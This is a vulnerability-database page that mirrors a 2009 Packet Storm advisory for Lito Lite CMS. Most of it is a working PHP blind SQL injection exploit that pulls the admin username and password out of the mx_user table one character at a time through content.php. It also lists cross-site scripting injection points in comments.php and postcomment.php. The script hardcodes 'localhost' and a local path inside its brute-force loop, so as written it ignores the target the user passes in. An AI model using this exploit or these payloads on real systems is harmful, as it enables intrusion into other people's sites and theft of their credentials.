Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormDarkjokerPACKETSTORM:73559
HistoryJan 04, 2009 - 12:00 a.m.

Lito Lite CMS XSS / SQL Injection

2009-01-0400:00:00
darkjoker
packetstormsecurity.com
15
JSON
`#--+++===================================================================================+++--#  
#--+++====== Lito Lite Multiple Cross Site Scripting / Blind SQL Injection Exploit ======+++--#  
#--+++===================================================================================+++--#  
  
# [+] XSS  
# [+] comments.php?id=>[js code]  
# [+] postcomment.php?id=>[js code]  
  
#!/usr/bin/php  
<?  
  
function query ($fld, $pos, $ord)  
{  
$sql = "x' OR ASCII(SUBSTRING((SELECT {$fld} FROM mx_user WHERE uid = 1),{$pos},1))={$ord} OR '1' = '2";  
$sql = str_replace (" ", "%20", $sql);  
$sql = str_replace ("'", "%27", $sql);  
return $sql;  
}  
function check ($host, $path, $fld, $pos, $char)  
{  
$fp = fsockopen ($host, 80);  
$char = ord ($char);  
  
$query = query ($fld, $pos, $char);  
  
$req = "GET {$path}/content.php?id={$query} HTTP1.1\r\n".  
"Host: {$host}\r\n".  
"Connection: Close\r\n\r\n";  
  
fputs ($fp, $req);  
  
while (!feof ($fp))  
$cont .= trim (fgets ($fp, 1024));  
  
fclose ($fp);  
  
$x = array ();  
  
preg_match ("/<div id=\"wrapper\">(.+?)div>/", $cont, $x);  
  
if (strlen ($x [1]) == 2)  
return false;  
else  
return true;  
}  
  
function brute ($host, $path, $fld, $key)  
{  
$pos = 1;  
$chr = 0;  
while ($chr < strlen ($key))  
{  
if (check ("localhost", "/xampp/lito_lite", $fld, $pos, $key [$chr]))  
{  
$res .= $key [$chr];  
$chr = -1;  
$pos++;  
}  
$chr++;  
}  
return $res;  
}  
  
function usage ()  
{  
echo "[+] Lito Lite Blind SQL Injection Exploit\n".  
"[+] Author: darkjoker ~ http://darkjokerside.altervista.org ~ darkjoker93[at]gmail[dot]com\n".  
"[+] Usage: php " . $argv [0] . " <hostname> <path> [key]\n".  
"[+] Ex. php ". $argv [0] . " localhost /lito_lite abcdefghijklmnopqrstuvwxyz0123456789\n".  
"[+] Greetz to athos, marco6\n";  
exit ();  
}  
  
  
if (count ($argv) < 3)  
usage ();  
  
$host = $argv [1];  
$path = $argv [2];  
if (empty ($argv [3]))  
$key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";  
else  
$key = $argv [3];  
  
echo "[+] Username: " . brute ($host, $path, "username", $key) . "\n".  
"[+] Password: " . brute ($host, $path, "password", $key) . "\n";  
  
?>  
  
  
`
JSON